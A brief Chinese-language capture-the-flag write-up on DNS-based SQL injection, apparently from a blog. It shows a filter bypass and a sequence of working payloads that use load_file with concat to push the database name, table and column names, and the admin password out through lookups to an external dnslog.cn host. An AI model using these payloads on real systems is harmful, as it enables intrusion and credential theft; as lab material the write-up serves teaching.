dns注入

发现传参 id=1 order by 1 会被拦截

image
尝试利用白名单机制 1.txt 绕过,发现可以绕过检测。
image
order by 判断字段数,发现有两个字段
image
image
id=2 and 1=2 union select 1,2 发现没有输出点
image
盲注太过繁琐,可以尝试用dnslog 构造 id=2 and load_file(concat('//',(select database()),'.enxetj.dnslog.cn/abc')) -- qwe 刷新dnslog,发现数据库名为 manzhu,说明可以用dns注入
image
构造 id=2 and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询表名,查到有admin和news表
image
构造 id=2 and load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询字段,发现有三个字段 id,username,password
image
猜想flag可能会在password字段里,构造 id=2 and load_file(concat('//',(select password from admin limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 发现flag:1flag1good1
image

你可能感兴趣的:(dns注入)